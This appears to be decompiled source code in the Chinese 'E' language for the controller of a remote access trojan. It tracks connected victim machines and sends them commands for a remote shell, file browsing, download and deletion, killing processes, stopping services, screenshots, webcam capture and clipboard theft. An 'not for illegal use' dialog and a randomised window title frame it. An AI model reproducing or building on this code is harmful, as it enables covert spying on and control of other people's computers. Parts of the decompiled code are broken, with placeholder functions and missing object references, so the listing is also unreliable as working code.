 ' 文件类型：Windows窗口程序

 ' 程序名称：
 ' 程序描述：
 ' 程序作者：
 ' 邮政编码：
 ' 联系地址：
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：
 ' 主页地址：
 ' 版权声明：
 ' 版本号：1.0
 ' 创建号：0.0

窗口 _启动窗口
    左边 = 50
    顶边 = 50
    宽度 = 658
    高度 = 499
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假

窗口 窗口2
    左边 = 50
    顶边 = 50
    宽度 = 251
    高度 = 145
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “请勿用于非法用途”
    帮助文件名 = “”

窗口 屏幕截图
    左边 = 50
    顶边 = 50
    宽度 = 618
    高度 = 444
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 真
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “”
    帮助文件名 = “”

窗口 视频捕获
    左边 = 50
    顶边 = 50
    宽度 = 486
    高度 = 377
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假





 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 4 4 系统核心支持库
 ' iext 27bb20fdd3e145e4bee3db39ddd6e64c 1 2 扩展界面支持库一
 ' dp1 4BB4003860154917BC7D8230BF4FA58A 1 0 数据操作支持库一




.全局变量 完整数据, 字节集, , "0", 全局变量,存放接收到的临时数据
.全局变量 当前控制客户, 文本型, , , 

.DLL命令 加载皮肤, 逻辑型, "SkinPlusForE.dll", "sppLoadSkin", , 
    .参数 strSkinFilePath, 文本型, , 皮肤路径
    .参数 fWithOutHook, 逻辑型, , 该参数指定加载皮肤时是否开启Hook功能

.DLL命令 移除皮肤, 逻辑型, "SkinPlusForE.dll", "sppRemoveSkin", , 

.DLL命令 显示标题栏按钮, 逻辑型, "SkinPlusForE.dll", "sppSetCustSysBtnVisible", , 
    .参数 uResID, 整数型, , 按钮的资源ID号
    .参数 bVisible, 逻辑型, , 是否可见

.DLL命令 设置系统按钮状态, 逻辑型, "SkinPlusForE.dll", "sppSetCustSysBtnStatus", , 
    .参数 uResID, 整数型, , 按钮的资源ID号
    .参数 bChecked, 逻辑型, , 选中状态为真，非选中状态为假

.DLL命令 设置皮肤色调, 逻辑型, "SkinPlusForE.dll", "sppColorize", , 
    .参数 clr, 长整数型, , 皮肤色调 如果clr==-1
    .参数 blend, 双精度小数型, , 混合透明度 0-1
    .参数 bShowDialog, 逻辑型, , 是否显示颜色选择对话框

.DLL命令 选择皮肤, 逻辑型, "SkinPlusForE.dll", "sppSelectSkin", , 

.DLL命令 获得皮肤颜色, 长整数型, "SkinPlusForE.dll", "sppGetSkinSysColor", , 
    .参数 nColorIndex, 整数型, , 要获取的颜色类型

.DLL命令 获取系统颜色, 长整数型, "SkinPlusForE.dll", "sppGetDefaultSysColor", , 
    .参数 nColorIndex, 整数型, , 要获取的颜色类型

.DLL命令 设置窗口标识, 逻辑型, "SkinPlusForE.dll", "sppSetWindowResID", , 
    .参数 hWnd, 整数型, , 窗口的句柄
    .参数 nResID, 整数型, , 资源标识值 > 0

.DLL命令 获取窗口标识, 整数型, "SkinPlusForE.dll", "sppGetWindowResID", , 
    .参数 hWnd, 整数型, , 窗口的句柄

.DLL命令 设置异型窗口标识, 逻辑型, "SkinPlusForE.dll", "sppSetFreeWindowID", , 
    .参数 hWnd, 整数型, , 窗口的句柄
    .参数 nResID, 整数型, , 资源标识值 > 0

.DLL命令 获取异型窗口标识, 整数型, "SkinPlusForE.dll", "sppGetFreeWindowID", , 
    .参数 hWnd, 整数型, , 窗口的句柄

.DLL命令 设置窗口自画, 逻辑型, "SkinPlusForE.dll", "sppSetCustomDraw", , 
    .参数 hWnd, 整数型, , 窗口的句柄
    .参数 bCustomDraw, 逻辑型, , 设置真为自己处理自画

.DLL命令 自画对话框背景, 逻辑型, "SkinPlusForE.dll", "sppSetDialogEraseBkgnd", , 
    .参数 hWnd, 整数型, , 窗口的句柄
    .参数 bErase, 逻辑型, , 设置真为自己画背景

.DLL命令 剪切对话框子控件区域, 逻辑型, "SkinPlusForE.dll", "sppSetDialogBkClipRgn", , 
    .参数 hWnd, 整数型, , 窗口的句柄
    .参数 bClip, 逻辑型, , 真为不需要剪切
    .参数 bAllChild, 逻辑型, , 真为该窗体的所有子窗口都剪切

.DLL命令 彻底移除窗口皮肤, 逻辑型, "SkinPlusForE.dll", "sppSetNoSkinHwnd", , 
    .参数 hWnd, 整数型, , 窗口的句柄
    .参数 bChildNoSkin, 逻辑型, , 真为对子窗口去掉皮肤，假为不对子窗口去掉皮肤

.DLL命令 窗口换肤, 逻辑型, "SkinPlusForE.dll", "sppSetSkinHwnd", , 
    .参数 hWnd, 整数型, , 窗口的句柄
    .参数 szClassName, 文本型, , 要子类化的Skin类型 “#32770” 等
    .参数 bChildSkin, 逻辑型, , 真为对该窗口中的子窗口加上皮肤，假为不对子窗口加上皮肤

.DLL命令 临时移除窗口皮肤, 逻辑型, "SkinPlusForE.dll", "sppRemoveSkinHwnd", , 
    .参数 hWnd, 整数型, , 窗口的句柄

.DLL命令 sppGetSystemMetrics, 整数型, "SkinPlusForE.dll", "sppGetSystemMetrics", , 
    .参数 hWnd, 整数型, , 窗口的句柄
    .参数 nIndex, 整数型, , 参数同GetSystemMetrics

.DLL命令 退出界面库, 逻辑型, "SkinPlusForE.dll", "sppExitSkin", , 

.DLL命令 设置窗口刷新, 逻辑型, "SkinPlusForE.dll", "sppSetRedraw", , 
    .参数 hWnd, 整数型, , 窗口的句柄
    .参数 bRedraw, 逻辑型, , 真为刷新

.程序集 启动子程序, , , 

.子程序 _启动子程序, 整数型, , 本子程序在程序启动后最先执行
 ' .如果真 (等于 (加载皮肤 (“skin.dat”, 假), 假))
     ' 信息框 (“加载皮肤失败”, #错误图标, “Error”)
.如果真结束
载入 (_启动窗口, , 假)


返回 (0) ' 可以根据您的需要返回任意数值

.窗口程序集 窗口程序集_启动窗口, , , 

.程序集变量 数据_程序集, 字节集, , , 储存接受到得数据
.程序集变量 文件管理_当前目录, 文本型, , , 储存当前访问的目录
.程序集变量 服务管理_文件头, 文本型, , , 
.子程序 _退出_被选择, 空白型, , 
结束 ()


.子程序 __启动窗口_创建完毕, 空白型, , 

动态标题 ()

.子程序 __启动窗口_将被销毁, 空白型, , 
 ' 移除皮肤 ()

.子程序 动态标题, 空白型, , 
置随机数种子 ()
赋值 (_启动窗口., 相加 (字符 (取随机数 (65, 90)), 到文本 (取随机数 (0, 10)), 字符 (取随机数 (65, 90)), 到文本 (取随机数 (0, 10)), 字符 (取随机数 (65, 90)), 到文本 (取随机数 (0, 10))))


.子程序 _工具条1_被单击, 空白型, , 
.参数 按钮索引, 整数型, , 

.判断开始 (等于 (按钮索引, 12)) ' 关于
    载入 (窗口2, , 假)
.判断 (等于 (按钮索引, 10)) ' 退出
    结束 ()
.判断 (等于 (按钮索引, 2)) ' 屏幕截图
    载入 (屏幕截图, , 假)
.判断 (等于 (按钮索引, 4)) ' 视频捕获
    载入 (视频捕获, , 假)
    
.默认
    
.判断结束




.子程序 _服务器1_客户进入, 空白型, , 
.局部变量 temp, 文本型, , , 

赋值 (temp, 取回客户 ())
取项目数 ().插入项目 (temp, )
播放音乐 (“sound\login.wav”, )

.子程序 _服务器1_客户离开, 空白型, , 
.局部变量 temp, 文本型, , , 
.局部变量 i, 空白型, , , 

赋值 (temp, 取回客户 ())
.计次循环首 (取项目数 (), i)
    .如果真 (等于 (相减 (i, 1).取项目文本 (), temp))
        相减 (i, 1).删除项目 ()
        .如果真 (等于 (当前控制客户, temp))
            播放音乐 (“sound\offline.wav”, )
            赋值 (当前控制客户, “”)
            跳出循环 ()
        .如果真结束
        
        
    .如果真结束
    
.计次循环尾 ()

.子程序 _服务器1_数据到达, 空白型, , 
.局部变量 temp, 字节集, , , 

赋值 (temp, 取回数据 ())
.如果真 (等于 (取字节集右边 (temp, 4), 到字节集 (“over”)))
    赋值 (数据_程序集, 相加 (数据_程序集, 取字节集左边 (temp, 相减 (取字节集长度 (temp), 4))))
    输出调试文本 (相加 (“已经接收到over : ”, 到文本 (取字节集长度 (数据_程序集))))
    处理数据 (数据_程序集)
    赋值 (数据_程序集, {  })
    返回 ()
.如果真结束
赋值 (数据_程序集, 相加 (数据_程序集, temp))
输出调试文本 (相加 (“这里是临时字节 : ”, 到文本 (取字节集长度 (数据_程序集))))
返回 ()
 ' 以下为过期代码.暂保留.......
未知函数_1895 () ' *** 缩略程序块 ***
 ' ' 临时测试区
 ' ' 输出调试文本 (取字节集右边 (temp, 取字节集长度 (temp) － 4))
 ' ' temp ＝ 取字节集右边 (temp, 取字节集长度 (temp) － 4)

 ' ' 输出调试文本 (取字节集长度 (temp))
 ' 返回 ()
 ' ' 测试完毕
 ' .如果真 (等于 (取字节集左边 (temp, 4), 到字节集 (“over”))) ' 如果发送完毕
    
     ' 加入成员 (完整数据, 取字节集右边 (temp, 取字节集长度 (temp) － 4))
     ' 输出调试文本 (取数组成员数 (完整数据))
     ' 数据排序 (完整数据)  ' 处理数据,进行排序校验
     ' 清除数组 (完整数据)  ' 清除数组,防止内存泄漏
     ' 返回 ()
.如果真结束

 ' 接受数据 (temp)
 ' temp ＝ {  }



 ' ' temp ＝ 服务器1.取回数据 ()  ' 取回数据,储存到临时变量
 ' ' ' 输出调试文本 (取字节集长度 (temp))
 ' .如果真 (等于 (temp, 到字节集 (“over”))) ' 如果发送完毕
     ' ' 数据排序 (完整数据)  ' 处理数据,进行排序校验
     ' ' 清除数组 (完整数据)  ' 清除数组,防止内存泄漏
     ' ' 返回 ()
.如果真结束


 ' ' 长度 ＝ 取字节集长度 (temp)  ' 得到数据长度
 ' .如果真 (等于 (未知函数_67174520 (temp, ), 假)) ' 效验数据是否正确
     ' ' ' ' 发送数据 (服务器1.取回客户 (), “错误”, 到文本 (取字节集中间 (temp, 33, 36)))  ' 如果错误,拒绝接受,返回序号.要求重发
     ' ' ' 输出调试文本 (“MD5校验出错!”)
     ' ' ' 返回 ()
.如果真结束
 ' ' 调试输出 (到文本 (取字节集中间 (temp, 33, 4)))
 ' ' 加入成员 (完整数据, 取字节集右边 (temp, 长度 － 32))  ' 如果没发送完毕.加入程序集变量等待下次数据



.子程序 _列表框1_列表项被选择, 空白型, , 
赋值 (当前控制客户, .取项目文本 (.现行选中项))
.判断开始 (等于 (.现行子夹, 1)) ' 系统信息
    发送数据 (当前控制客户, “信息”, )
.默认
    
.判断结束


.子程序 _选择夹1_子夹被改变, 空白型, , 
.判断开始 (等于 (.现行子夹, 1)) ' 系统信息
    发送数据 (当前控制客户, “信息”, )
.默认
    
.判断结束


.子程序 _远程命令按钮1_被单击, 空白型, , 
.局部变量 命令, 文本型, , , 

赋值 (命令, .内容)
发送数据 (当前控制客户, “命令”, 命令)


.子程序 _远程命令组合框1_放开某键, 逻辑型, , 
.参数 键代码, 整数型, , 
.参数 功能键状态, 整数型, , 

.如果真 (等于 (键代码, #回车键))
    _远程命令按钮1_被单击 ()
.如果真结束


.子程序 _远程命令按钮2_被单击, 空白型, , 
.如果 (等于 (.标题, “连接”))
    赋值 (.标题, “断开”)
    发送数据 (当前控制客户, “命令”, “连接”)
.否则
    赋值 (.标题, “连接”)
    发送数据 (当前控制客户, “命令”, “断开”)
.如果结束


.子程序 _按钮1_被单击, 空白型, , 
发送数据 (当前控制客户, “文件”, “disk”)
 ' 文件管理_当前目录 ＝ 文件管理_当前目录 ＋ “c:\”

.子程序 _文件管理超级列表框1_被双击, 逻辑型, , 
.参数 横向位置, 整数型, , 
.参数 纵向位置, 整数型, , 
.参数 功能键状态, 整数型, , 

.如果真 (小于 (., 0))
    返回 ()
.如果真结束

.如果真 (并且 (等于 (.取标题 (., ), “后退”), 等于 (., 0)))
    发送数据 (当前控制客户, “文件”, 文件管理_后退 (文件管理_当前目录))
    返回 ()
.如果真结束

赋值 (文件管理_当前目录, 相加 (文件管理_当前目录, .取标题 (., )))
.如果真 (不等于 (取文本右边 (文件管理_当前目录, 1), “\”))
    赋值 (文件管理_当前目录, 相加 (文件管理_当前目录, “\”))
.如果真结束
输出调试文本 (文件管理_当前目录)
发送数据 (当前控制客户, “文件”, 文件管理_当前目录)


.子程序 _按钮2_被单击, 空白型, , 
发送数据 (当前控制客户, “进程”, “list”)


.子程序 _进程管理超级列表框1_右键单击表项, 空白型, , 
弹出菜单 ()


.子程序 _刷新列表_被选择, 空白型, , 
发送数据 (当前控制客户, “进程”, “list|”)

.子程序 _结束进程_被选择, 空白型, , 
发送数据 (当前控制客户, “进程”, 相加 (“kill|”, .取标题 (., 1)))


.子程序 _暂停进程_被选择, 空白型, , 
发送数据 (当前控制客户, “进程”, 相加 (“stop|”, .取标题 (., 1)))

.子程序 _恢复进程_被选择, 空白型, , 
发送数据 (当前控制客户, “进程”, 相加 (“stat|”, .取标题 (., 1)))

.子程序 _服务管理超级列表框1_右键单击表项, 空白型, , 
.判断开始 (等于 (.取标题 (., 4), “正在运行”))
    
    赋值 (.标题, “停止服务”)
    
.判断 (等于 (.取标题 (., 4), “已停止”))
    赋值 (.标题, “运行服务”)
.默认
    
.判断结束

弹出菜单 ()


.子程序 _服务菜单1_被选择, 空白型, , 
.如果 (等于 (.标题, “停止服务”))
    发送数据 (当前控制客户, “服务”, 相加 (“exit”, .取标题 (., )))
.否则
    发送数据 (当前控制客户, “服务”, 相加 (“erun”, .取标题 (., )))
.如果结束




.子程序 _暂停服务_被选择, 空白型, , 
发送数据 (当前控制客户, “服务”, 相加 (“stop”, .取标题 (., )))

.子程序 _继续服务_被选择, 空白型, , 
发送数据 (当前控制客户, “服务”, 相加 (“reun”, .取标题 (., )))


.子程序 _刷新列表_服务_被选择, 空白型, , 
.局部变量 temp, 文本型, , , 

.如果 (等于 (.选中, 真))
    赋值 (temp, “list2”) ' 驱动级
.否则
    赋值 (temp, “list1”) ' 服务级
.如果结束
发送数据 (当前控制客户, “服务”, temp)


.子程序 文件管理_后退, 文本型, , 
.参数 参数, 文本型, 参考, 

.局部变量 temp, 文本型, , , 
.局部变量 位置_, 整数型, , , 

.如果真 (等于 (取文本右边 (参数, 1), “\”))
    赋值 (参数, 取文本左边 (参数, 相减 (取文本长度 (参数), 1)))
.如果真结束

赋值 (位置_, 倒找文本 (参数, “\”, , 假))
赋值 (参数, 取文本左边 (参数, 位置_))
.如果真 (不等于 (参数, “”))
    返回 (参数)
.如果真结束
返回 (“disk”)




.子程序 _文件管理_刷新列表_被选择, 空白型, , 
.如果真 (等于 (文件管理_当前目录, “”))
    发送数据 (当前控制客户, “文件”, “disk”)
    返回 ()
.如果真结束

发送数据 (当前控制客户, “文件”, 文件管理_当前目录)


.子程序 _文件管理超级列表框1_右键单击表项, 空白型, , 
弹出菜单 ()


.子程序 _下载_被选择, 空白型, , 
.局部变量 文件名, 文本型, , , 

赋值 (文件名, .取标题 (., ))
.如果真 (不等于 (取文本右边 (文件管理_当前目录, 1), “\”))
    赋值 (文件管理_当前目录, 相加 (文件管理_当前目录, “\”))
.如果真结束

赋值 (文件名, 相加 (文件管理_当前目录, 文件名))
发送数据 (当前控制客户, “下载”, 相加 (“下载”, 文件名))


.子程序 _剪辑版按钮1_被单击, 空白型, , 
发送数据 (当前控制客户, “剪辑”, “取文本”)


.子程序 _剪辑版按钮2_被单击, 空白型, , 
发送数据 (当前控制客户, “剪辑”, 相加 (“置文本”, .内容))


.子程序 _重命名_被选择, 空白型, , 
.局部变量 文件名, 文本型, , , 
.局部变量 新文件名, 文本型, , , 

赋值 (文件名, .取标题 (., ))
.如果真 (不等于 (取文本右边 (文件管理_当前目录, 1), “\”))
    赋值 (文件管理_当前目录, 相加 (文件管理_当前目录, “\”))
.如果真结束

赋值 (文件名, 相加 (文件管理_当前目录, 文件名))
 ' 输入框 (“请输入新的文件名”, “输入框”, 文件名, 新文件名, )
发送数据 (当前控制客户, “下载”, 相加 (“重命”, 文件名, “|”, 新文件名))


.子程序 _删除文件_被选择, 空白型, , 
.局部变量 文件名, 文本型, , , 

赋值 (文件名, .取标题 (., ))
.如果真 (不等于 (取文本右边 (文件管理_当前目录, 1), “\”))
    赋值 (文件管理_当前目录, 相加 (文件管理_当前目录, “\”))
.如果真结束

赋值 (文件名, 相加 (文件管理_当前目录, 文件名))
发送数据 (当前控制客户, “下载”, 相加 (“删除”, 文件名))


.程序集 公开接口, , , 

.子程序 发送数据, 空白型, , 发送数据给被控端
.参数 IP地址, 文本型, , IP:端口
.参数 命令头, 文本型, , 
.参数 数据, 文本型, 可空, 

_启动窗口.发送数据 (., IP地址, 相加 (命令头, 数据, “over”), )

.子程序 处理数据, 空白型, , 处理服务器接受到的数据
.参数 数据, 字节集, , 

.局部变量 命令头, 字节集, , , 

赋值 (命令头, 取字节集左边 (数据, 4))
输出调试文本 (取字节集长度 (数据))
.判断开始 (等于 (命令头, 到字节集 (“命令”)))
    远程命令 (取字节集右边 (数据, 相减 (取字节集长度 (数据), 4)))
.判断 (等于 (命令头, 到字节集 (“信息”)))
    系统信息 (取字节集右边 (数据, 相减 (取字节集长度 (数据), 4)))
.判断 (等于 (命令头, 到字节集 (“文件”)))
    文件管理 (取字节集右边 (数据, 相减 (取字节集长度 (数据), 4)))
.判断 (等于 (命令头, 到字节集 (“截图”)))
    .如果真 (等于 (屏幕截图..选中, 真))
        发送数据 (当前控制客户, “截图”, “ok”)
    .如果真结束
    屏幕截图 (取字节集右边 (数据, 相减 (取字节集长度 (数据), 4)))
.判断 (等于 (命令头, 到字节集 (“进程”)))
    进程管理 (取字节集右边 (数据, 相减 (取字节集长度 (数据), 4)))
.判断 (等于 (命令头, 到字节集 (“服务”)))
    服务管理 (取字节集右边 (数据, 相减 (取字节集长度 (数据), 4)))
.判断 (等于 (命令头, 到字节集 (“视频”)))
    发送数据 (当前控制客户, “视频”, “ok”)
    视频捕获 (取字节集右边 (数据, 相减 (取字节集长度 (数据), 4)))
     ' -------
    
     ' --------
.判断 (等于 (命令头, 到字节集 (“剪辑”)))
    剪辑板操作 (取字节集右边 (数据, 相减 (取字节集长度 (数据), 4)))
.判断 (等于 (命令头, 到字节集 (“下载”)))
    下载文件 (取字节集右边 (数据, 相减 (取字节集长度 (数据), 4)))
.默认
    
.判断结束


.程序集 数据处理, , , 

.子程序 系统信息, 空白型, , 
.参数 参数, 字节集, , 

.局部变量 temp, 文本型, , "0", 
.局部变量 i, 整数型, , , 


赋值 (temp, 分割文本 (到文本 (参数), “|”, ))
.计次循环首 (取数组成员数 (temp), i)
    _启动窗口.置标题 (., 相减 (i, 1), 1, temp [i])
    
.计次循环尾 ()

.子程序 文件管理, 空白型, , 
.参数 参数, 字节集, , 

.局部变量 文件列表, 文本型, , "0", 
.局部变量 i, 整数型, , , 

_启动窗口.全部删除 (.)
.如果真 (等于 (取文本左边 (到文本 (参数), 4), “disk”))
    赋值 (文件列表, 分割文本 (到文本 (参数), “|”, ))
    .计次循环首 (相减 (取数组成员数 (文件列表), 1), i)
        _启动窗口.插入表项 (., , 文件列表 [相加 (i, 1)], 20, , , )
    .计次循环尾 ()
    返回 ()
     ' 上面的是插入磁盘
.如果真结束

赋值 (文件列表, 分割文本 (到文本 (参数), “|”, ))

_启动窗口.插入表项 (., , “后退”, 10, , , 0)
.计次循环首 (取数组成员数 (文件列表), i)
    
    .如果真 (等于 (取文本右边 (文件列表 [i], 1), “\”))
        .如果真 (或者 (等于 (文件列表 [i], “.\”), 等于 (文件列表 [i], “..\”)))
            到循环尾 ()
        .如果真结束
        
        _启动窗口.插入表项 (., , 取文本左边 (文件列表 [i], 相减 (取文本长度 (文件列表 [i]), 1)), 0, , , 0)
        到循环尾 ()
        
    .如果真结束
    _启动窗口.插入表项 (., , 文件列表 [i], 文件管理_后缀判定 (文件列表 [i]), , , 1)
.计次循环尾 ()

.子程序 远程命令, 空白型, , 
.参数 参数, 字节集, , 

.局部变量 命令, 文本型, , , 

赋值 (命令, 到文本 (参数))
赋值 (_启动窗口..内容, 相加 (_启动窗口..内容, 命令))
赋值 (_启动窗口..起始选择位置, -1)

.子程序 屏幕截图, 空白型, , 
.参数 参数, 字节集, , 

输出调试文本 (相加 (“这里是屏幕截图,传递的数据长度为 : ”, 到文本 (取字节集长度 (参数))))
赋值 (屏幕截图..底图, 未知支持库函数_1 (参数))


.子程序 进程管理, 空白型, , 
.参数 参数, 字节集, , 

.局部变量 进程列表, 文本型, , "0", 
.局部变量 i, 整数型, , , 
.局部变量 temp, 文本型, , "0", 
.局部变量 j, 整数型, , , 

_启动窗口.全部删除 (.)
赋值 (进程列表, 分割文本 (到文本 (参数), “|”, ))
.计次循环首 (取数组成员数 (进程列表), i)
    赋值 (temp, 分割文本 (进程列表 [i], “,”, ))
    _启动窗口.插入表项 (., , , , , , )
    .计次循环首 (取数组成员数 (temp), j)
        _启动窗口.置标题 (., 相减 (i, 1), 相减 (j, 1), temp [j])
    .计次循环尾 ()
    
    
    
    
.计次循环尾 ()

.子程序 文件管理_后缀判定, 整数型, , 返回图片索引
.参数 文件名参数, 文本型, , 


.判断开始 (等于 (文本比较 (取文本右边 (文件名参数, 3), “exe”, 假), 0))
    返回 (1)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “txt”, 假), 0))
    返回 (2)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “rar”, 假), 0))
    返回 (3)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “jpg”, 假), 0))
    返回 (4)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “bmp”, 假), 0))
    返回 (5)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “dll”, 假), 0))
    返回 (6)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “bat”, 假), 0))
    返回 (7)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “mp3”, 假), 0))
    返回 (11)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “wma”, 假), 0))
    返回 (12)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “mp4”, 假), 0))
    返回 (13)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “avi”, 假), 0))
    返回 (14)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “dat”, 假), 0))
    返回 (15)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “swf”, 假), 0))
    返回 (16)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “mpg”, 假), 0))
    返回 (17)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 4), “mpeg”, 假), 0))
    返回 (18)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 2), “rm”, 假), 0))
    返回 (19)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 4), “rmvb”, 假), 0))
    返回 (19)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “zip”, 假), 0))
    返回 (3)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “iso”, 假), 0))
    返回 (3)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “cab”, 假), 0))
    返回 (3)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “log”, 假), 0))
    返回 (2)
.判断 (等于 (文本比较 (取文本右边 (文件名参数, 3), “ini”, 假), 0))
    返回 (21)
.默认
    
.判断结束

返回 (9)

.子程序 服务管理, 空白型, , 
.参数 参数, 字节集, , 

.局部变量 服务列表, 文本型, , "0", 
.局部变量 i, 整数型, , , 
.局部变量 temp, 文本型, , "0", 
.局部变量 j, 整数型, , , 

_启动窗口.全部删除 (.)
赋值 (服务列表, 分割文本 (到文本 (参数), “|”, ))
.计次循环首 (取数组成员数 (服务列表), i)
    赋值 (temp, 分割文本 (服务列表 [i], “,”, ))
    _启动窗口.插入表项 (., , , , , , )
    .计次循环首 (取数组成员数 (temp), j)
        _启动窗口.置标题 (., 相减 (i, 1), 相减 (j, 1), temp [j])
    .计次循环尾 ()
    
.计次循环尾 ()

.子程序 视频捕获, 空白型, , 
.参数 参数, 字节集, , 

.如果真 (是否已创建 (视频捕获.))
    赋值 (视频捕获..底图, 未知支持库函数_1 (参数))
.如果真结束




.子程序 剪辑板操作, 空白型, , 
.参数 参数, 字节集, , 

.局部变量 命令, 文本型, , , 

赋值 (命令, 到文本 (取字节集左边 (参数, 4)))
.判断开始 (等于 (命令, “文本”))
    .如果真 (小于或等于 (取字节集长度 (参数), 4))
        _启动窗口.加入文本 (., 相加 (“目前远端剪辑版内无文本内容”, #换行符))
        返回 ()
    .如果真结束
    
    _启动窗口.加入文本 (., 相加 (到文本 (取字节集右边 (参数, 相减 (取字节集长度 (参数), 4))), #换行符))
.默认
    
.判断结束



.子程序 下载文件, 空白型, , 
.参数 参数, 字节集, , 

信息框 (“文件下载完毕”, 0, )
赋值 (_启动窗口..类型, 1)
赋值 (_启动窗口..标题, “保存文件”)
.如果真 (_启动窗口.打开 (.))
    写到文件 (_启动窗口..文件名, 未知支持库函数_1 (参数))
.如果真结束


.窗口程序集 窗口程序集_屏幕截图, , , 

.子程序 _按钮1_被单击, 空白型, , 
发送数据 (当前控制客户, “截图”)


.子程序 _屏幕截图_尺寸被改变, 空白型, , 
赋值 (.高度, 相减 (., 80))
赋值 (.宽度, 相减 (., 20))
赋值 (.左边, 相减 (., 100))
赋值 (.顶边, 相加 (.高度, 15))
赋值 (.顶边, 相加 (.顶边, 5))
赋值 (.左边, 相减 (.左边, .宽度, 20))


.窗口程序集 窗口程序集_视频捕获, , , 

.程序集变量 匿名程序集变量_444, 空白型, , , 
.子程序 _按钮1_被单击, 空白型, , 
发送数据 (当前控制客户, “视频”, “stat”)

.子程序 _按钮2_被单击, 空白型, , 
发送数据 (当前控制客户, “视频”, “exit”)


 ' 不属于任何一个程序集、类模块的函数：
